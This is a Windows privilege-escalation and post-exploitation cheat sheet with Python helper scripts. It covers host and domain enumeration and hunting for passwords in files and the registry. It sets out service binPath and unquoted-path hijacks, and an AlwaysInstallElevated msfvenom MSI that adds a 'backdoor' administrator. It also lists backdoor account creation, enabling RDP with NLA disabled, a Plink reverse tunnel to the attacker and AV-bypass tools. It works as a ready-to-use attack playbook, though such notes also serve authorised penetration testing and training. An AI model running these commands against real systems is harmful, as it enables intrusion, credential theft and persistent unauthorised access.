Basic Host Information (Kernel Exploits etc. etc.)
ver
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
tasklist /v
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
wmic os get Caption, CSDVersion /value
Find user information
whoami
echo %username%
net user
net user (username)
echo %userprofile%
net localgroup
net config Workstation | find "User name"
query user
wmic useraccount get name
wmic /node: "127.0.0.1" computersystem get username
qwinsta
cmdkey /list
Learn about your ENV and what you have access to (SET dumps the environment variables; net with no arguments lists the available NET subcommands)
SET
net
Check Domains and Domain Info
net view /domain
net view /domain:THINC
net localgroup "Administrators"
net group "Domain Admins" /domain
net share
net session | find "\\"
What’s going on with the network could benefit you now or later
ipconfig /all
route print
arp -a
netstat -ano
Check for autologon credentials in the registry (the user enumeration commands are listed under Find user information above):
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword
List stored credentials (Windows Credential Manager):
cmdkey /list
Simple File Search:
dir /s *password*
findstr /s /n /i /p password *
findstr /si password *.txt
dir /s *secret*
findstr /s /n /i /p secret *
findstr /si secret *.txt
Check installed programs, permissions, and hidden files:
dir /q
dir /r
attrib *.*
wmic /node: "127.0.0.1" product get name, version
wmic product get /format:list
Notes
dir /q shows file owners, dir /r shows alternate data streams, and attrib lists attributes (hidden files show an H). Do not run attrib -h *.*: that clears the hidden attribute on every file instead of listing it. The wmic product class only covers MSI-installed software and runs a consistency check on every package when queried, which is slow and writes Windows Installer events to the Application log, so expect noise.
Check Scheduled Tasks (the Windows equivalent of cron jobs)
schtasks /query
schtasks /query /v /fo LIST
Get-ScheduledTask | Where State -EQ 'Ready'
Check for Patch Levels
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn
Notes
Look for privilege escalation exploits and look up their respective KB patch numbers. Such exploits include, but are not limited to, KiTrap0D (MS10-015, KB977165), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799)
After enumerating the OS version and Service Pack you should find out which privilege escalation vulnerabilities could be present. Using the KB patch numbers you can grep the installed patches to see if any are missing. A missing KB is only a lead: confirm that the OS and service pack are in the bulletin's affected list, since a later cumulative update can supersede an individual KB.
Search patches for given patch
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
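Worked example (added here, not part of the original notes): a Python script that does the KB comparison above against a constructed wmic qfe listing. The sample rows, dates and the extra KB976902 entry are made up; the KB-to-bulletin table is the one from the note above, with KiTrap0D mapped to its actual fix, MS10-015 / KB977165.

```python
import re

# Privilege-escalation fixes from the list above, KB article -> bulletin.
# KiTrap0D was fixed by MS10-015 / KB977165; the other entries are as on the page.
PRIVESC_KBS = {
    "KB977165": "MS10-015 (KiTrap0D)",
    "KB979683": "MS10-021",
    "KB982799": "MS10-059",
    "KB2393802": "MS11-011",
    "KB2592799": "MS11-080",
}

# Constructed sample in the column layout that
# "wmic qfe get Caption,Description,HotFixID,InstalledOn" prints.
# Dates and the KB976902 row are made up for the example.
SAMPLE_QFE = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=982799   Security Update  KB982799   7/13/2010
http://support.microsoft.com/?kbid=2393802  Security Update  KB2393802  2/9/2011
http://support.microsoft.com/?kbid=976902   Update           KB976902   11/21/2010
                                            Security Update  KB2592799  10/12/2011
"""

HOTFIX_RE = re.compile(r"\bKB(\d{5,7})\b", re.I)      # HotFixID column
KBID_RE = re.compile(r"[?&]kbid=(\d{5,7})\b", re.I)   # Caption URL, in case HotFixID is blank


def installed_kbs(qfe_output):
    """Set of KB identifiers present in wmic qfe output, normalised to 'KB<digits>'."""
    kbs = set()
    for line in qfe_output.splitlines():
        for rx in (HOTFIX_RE, KBID_RE):
            for m in rx.finditer(line):
                kbs.add("KB" + m.group(1))
    return kbs


def missing_privesc_patches(qfe_output, table=PRIVESC_KBS):
    """KBs from the table that are not installed, as (KB, bulletin) sorted by KB number.

    A missing KB is a lead, not proof: the fix may have been superseded by a later
    cumulative update, or the OS/service pack may not be affected at all, so check
    the bulletin's affected-product list against the systeminfo output first.
    """
    have = installed_kbs(qfe_output)
    return sorted(((kb, bul) for kb, bul in table.items() if kb not in have),
                  key=lambda item: int(item[0][2:]))


if __name__ == "__main__":
    for kb, bulletin in missing_privesc_patches(SAMPLE_QFE):
        print(f"missing {kb}  ({bulletin})")
```

Matching on the whole KB token (the \b anchors) avoids the partial-match problem of a bare findstr substring, and pulling the number out of the Caption URL as well covers rows where the HotFixID column is empty.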
Find writable files (Use with scheduled tasks and Program Files executables running as an admin or SYSTEM account)
dir /a-r-d /s /b
Notes
/a is to search for attributes. In this case r is read only and d is directory. The minus signs negate those attributes, so this lists files that do not carry the read-only attribute.
/s means recurse subdirectories
/b means bare format. Path and filename only.
The read-only attribute is not an ACL: a file without it can still be unwritable for you, and a file with it can be writable. Confirm candidates with icacls or accesschk before relying on them.
Check Permissions of Program Files / x86 executables / scheduled-task executables
icacls.exe
Notes
Run icacls against the executable or its folder and look for (F), (M) or (W) granted to your user, Users, Authenticated Users or Everyone. Use a writable executable to elevate permissions by replacing it with a backdoor or reverse shell; it then runs as whoever launches it (the service account or the task's principal).
Unquoted Service Paths (Windows resolves an unquoted path containing spaces by trying the shorter names first, so a planted EXE runs instead of the real one; look for services running as a privileged account)
List all unquoted service paths (minus built-in Windows services) on our compromised machine:
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Suppose we found:
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
If you look at the registry entry for this service with Regedit you can see the ImagePath value is:
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
To be secure it should be like this:
“C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe”
When Windows starts this service, CreateProcess tries the following names in order and runs the first one that exists:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Program.exe
C:\Program Files (x86)\Program Folder\A.exe
…
Check permissions of folder path
icacls "C:\Program Files (x86)\Program Folder"
If we can write to one of those directories we plant an executable with the matching decoy name (for example A.exe in Program Folder) and restart the service; without stop/start rights on the service, wait for a reboot. The planted binary runs as the service account (often LocalSystem), so it should either behave as a service or spawn the real payload and exit before the service controller times it out.
Metasploit module:
exploit/windows/local/trusted_service_path
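Worked example (added here, not part of the original notes): the name-splitting rule above as a Python script, together with the same auto-start / not-under-C:\Windows / unquoted filter the wmic pipeline applies. The service rows are constructed to look like parsed wmic output; the names VulnSvc, GoodSvc, ArgSvc and NoSpace and their paths are invented.

```python
import ntpath

# Constructed sample rows in the shape you get after parsing
# "wmic service get name,pathname,startmode"; names and paths are made up.
SAMPLE_SERVICES = [
    {"Name": "GoodSvc", "StartMode": "Auto",
     "PathName": '"C:\\Program Files\\Good Vendor\\goodsvc.exe" -service'},
    {"Name": "VulnSvc", "StartMode": "Auto",
     "PathName": "C:\\Program Files (x86)\\Program Folder\\A Subfolder\\Executable.exe"},
    {"Name": "ArgSvc", "StartMode": "Manual",
     "PathName": "C:\\Program Files\\My App\\svc.exe -config C:\\x"},
    {"Name": "Spooler", "StartMode": "Auto",
     "PathName": "C:\\Windows\\System32\\spoolsv.exe"},
    {"Name": "NoSpace", "StartMode": "Auto",
     "PathName": "C:\\Tools\\agent.exe"},
]


def split_candidates(pathname):
    """Return (decoys, real).

    For an unquoted path, CreateProcess extends the name one space-separated token
    at a time, appending .exe to each prefix that lacks an extension, until a prefix
    that ends in .exe is reached (the intended binary). Everything tried before it
    is a decoy name an attacker could plant. A quoted path has no decoys.
    """
    p = pathname.strip()
    if p.startswith('"'):
        return [], p[1:p.find('"', 1)]
    tokens = p.split(" ")
    decoys = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            return decoys, prefix
        decoys.append(prefix + ".exe")
    return decoys, None  # no .exe anywhere: every prefix is a candidate


def hijack_dirs(pathname):
    """Directories that must be writable to plant one of the decoys, in the order
    Windows would find them; duplicates (C:\\ appears twice) are collapsed."""
    decoys, _ = split_candidates(pathname)
    seen, dirs = set(), []
    for d in (ntpath.dirname(c) for c in decoys):
        if d.lower() not in seen:
            seen.add(d.lower())
            dirs.append(d)
    return dirs


def find_unquoted(services, include_windows=False):
    """Same filter as the wmic | findstr pipeline above: auto-start services whose
    path is unquoted and contains a space, skipping C:\\Windows unless asked."""
    hits = []
    for s in services:
        p = s["PathName"].strip()
        if s["StartMode"].lower() != "auto":
            continue
        if not include_windows and p.lower().startswith("c:\\windows\\"):
            continue
        if not p.startswith('"') and " " in p:
            hits.append(s["Name"])
    return hits


if __name__ == "__main__":
    for name in find_unquoted(SAMPLE_SERVICES):
        path = next(s["PathName"] for s in SAMPLE_SERVICES if s["Name"] == name)
        decoys, real = split_candidates(path)
        print(f"{name}: {real}")
        for d in decoys:
            print(f"    tried first: {d}")
        print(f"    check with icacls: {hijack_dirs(path)}")
```

The list that hijack_dirs returns is exactly what to feed to icacls: if any of those directories grants you write or modify access, the service is exploitable regardless of how tight the permissions on the real Executable.exe are.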
Check for Vulnerable Services
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe (archived 2008 build; the current version is at https://live.sysinternals.com/accesschk.exe)
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
accesschk.exe -qdws Users C:\Windows\
Then query the service using Windows sc:
sc qc <vulnerable service name>
Then change the binpath to execute your own commands. The service must be restarted for the new binpath to run; expect sc start to fail with error 1053 (timeout) because the payload is not a real service binary, but by then the command has already executed as the service account:
sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
sc stop <vuln-service>
sc start <vuln-service>
sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
sc stop <vuln-service>
sc start <vuln-service>
Note - If the service has dependencies or runs under a non-default account, set them explicitly (sc needs the space after each option's =):
sc stop <vuln-service>
sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
sc start <vuln-service>
Metasploit module:
exploit/windows/local/service_permissions
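Worked example (added here, not part of the original notes): a Python script that parses the accesschk -uwcqv listing for the rights that actually let you rewrite binPath, tells you whether the same principal can also stop and start the service, and emits the sc sequence above. The accesschk output is constructed in the layout the tool prints (an unindented "RW name" line per object with the rights indented beneath it); the service names SSDPSRV, VulnSvc, ConfigOnly and CtrlOnly and their rights are invented.

```python
# Service rights that let the principal change what the service executes, either
# directly (SERVICE_CHANGE_CONFIG) or by first rewriting the ACL or owner.
DANGEROUS = {"SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG",
             "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL", "GENERIC_WRITE"}
# Rights that let the principal bounce the service so the new binPath runs now;
# without them the payload only fires at the next reboot.
CAN_RESTART = {"SERVICE_ALL_ACCESS", "GENERIC_ALL", "GENERIC_EXECUTE",
               "SERVICE_START", "SERVICE_STOP"}

# Constructed sample in the layout accesschk -uwcqv prints: an unindented
# "RW <service>" (or "W  <service>") line followed by one indented right per line.
# Service names and rights are made up for the example.
SAMPLE_ACCESSCHK = """\
RW SSDPSRV
        SERVICE_ALL_ACCESS
RW VulnSvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL
RW ConfigOnly
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        READ_CONTROL
W  CtrlOnly
        SERVICE_USER_DEFINED_CONTROL
"""


def parse_accesschk(output):
    """Map service name -> set of rights from accesschk's verbose listing."""
    services, current = {}, None
    for line in output.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():  # indented: a right belonging to the current service
            if current is not None:
                services[current].add(line.strip())
        else:                  # "RW name": access summary, then the object name
            _flags, current = line.split(None, 1)
            services[current] = set()
    return services


def exploitable(services):
    """Services whose rights allow rewriting binPath, with whether the same
    principal can also stop/start them."""
    out = {}
    for name, rights in services.items():
        hit = sorted(rights & DANGEROUS)
        if hit:
            out[name] = {"rights": hit, "can_restart": bool(rights & CAN_RESTART)}
    return out


def sc_hijack_commands(service, command, restart=True):
    """The sc.exe sequence from the notes above. sc's parser requires the space
    after 'binPath=' (and after every other option); 'binPath="..."' is rejected."""
    cmds = [f'sc config {service} binPath= "{command}"']
    if restart:
        # sc start will report error 1053 (timeout) because the payload is not a
        # real service binary, but the command has already run as the service account.
        cmds += [f"sc stop {service}", f"sc start {service}"]
    return cmds


if __name__ == "__main__":
    for name, info in exploitable(parse_accesschk(SAMPLE_ACCESSCHK)).items():
        note = "" if info["can_restart"] else "  (no start/stop right: needs a reboot)"
        print(f"{name}: {', '.join(info['rights'])}{note}")
        for c in sc_hijack_commands(name, "net user backdoor backdoor123 /add", info["can_restart"]):
            print("    " + c)
```

CtrlOnly is deliberately left out of the result: accesschk -w lists it because SERVICE_USER_DEFINED_CONTROL counts as a write right, but that right only lets you send custom control codes, not change what the service runs.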
OTHER
Search for common files with default/cleartext creds
- dir /b /s unattend.xml
- dir /b /s web.config
- dir /b /s sysprep.inf
Grep the registry for keywords (e.g. "password")
- reg query HKLM /f password /t REG_SZ /s
- reg query HKCU /f password /t REG_SZ /s
- reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
- reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
- reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
- reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
AlwaysInstallElevated
- AlwaysInstallElevated is a policy that lets non-privileged users run Windows Installer packages (MSI) with elevated (SYSTEM) permissions. It only takes effect when both of these registry values are set to 1; setting just one of them is ignored:
- reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- If they are, create your own malicious msi:
- msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
- Then use msiexec on victim to execute your msi:
- msiexec /quiet /qn /i C:\evil.msi
- Metasploit module:
- exploit/windows/local/always_install_elevated
Post Exploit / Backdoor Commands
- Add Users
- net user username password /add
- net localgroup Administrators username /add
- net localgroup "Remote Desktop Users" username /add
- psexec.exe -accepteula \\10.11.10.167 -u hostname\username -p password cmd /c ipconfig
- RunAs
- runas /user:hostname\<username> explorer.exe
- Firewall (show state; the netsh firewall context is the deprecated XP/2003 one, netsh advfirewall is current)
- netsh firewall show state
- netsh firewall show config
- netsh advfirewall firewall show rule all
- RDP
- Enable RDP
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- Disable Network Level Authentication (NLA) so older RDP clients and pass-the-hash RDP tooling can connect
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
- Remote port forward with Plink (tunnel RDP, SMB, etc. from the victim back to your box: afterwards, localhost:9595 on 10.11.0.70 reaches port 445 on the victim)
- plink.exe -l <user> -pw <password> 10.11.0.70 -R 9595:localhost:445
- Post Exploit Command and Control Examples (Impacket; smbexec.py and dcomexec.py avoid uploading a binary, psexec.py drops a service executable on the target)
- dcomexec.py username:password@10.11.10.167 dir
- psexec.py username:password@10.11.10.167 net user
- ./smbexec.py username:password@192.168.1.103
- Bypass AV
- veil-evasion
- crypters
- hyperion.exe
Exploit Suggesters / Priv Esc Helpers
- /var/www/tmp/linux-exploit-suggester.sh
- /var/www/tmp/windows-privesc-check2.exe
- /usr/bin/unix-privesc-check
- windows-exploit-suggester.py
- https://github.com/breenmachine/RottenPotatoNG
- https://www.blackhillsinfosec.com/a-toast-to-kerberoast/
- https://www.kali.org/penetration-testing/passing-hash-remote-desktop/